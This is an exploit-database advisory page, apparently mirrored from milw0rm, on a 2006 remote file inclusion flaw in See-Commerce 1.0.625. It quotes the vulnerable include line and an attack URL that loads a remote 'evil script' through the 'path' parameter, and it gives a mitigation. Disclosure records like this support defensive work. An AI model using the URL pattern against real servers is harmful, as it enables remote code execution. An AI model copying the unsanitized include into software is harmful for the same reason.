header-logo
Suggest Exploit
vendor:
See-Commerce
by:
ToXiC
8,8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: See-Commerce
Affected Version From: 1.0.625
Affected Version To: 1.0.625
Patch Exists: NO
Related CWE: N/A
CPE: a:seecommerce:see-commerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

See-Commerce Remote File Inclusion

See-Commerce is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. The attacker can supply a URL in the 'path' parameter to execute arbitrary code. Successful exploitation requires that 'register_globals' is enabled.

Mitigation:

Disable 'register_globals' and ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

See-Commerce Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip

Problem Is:
require($path."/ow.inc");

Page Affect:
http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]

Greatz : Str0ke

# milw0rm.com [2006-08-09]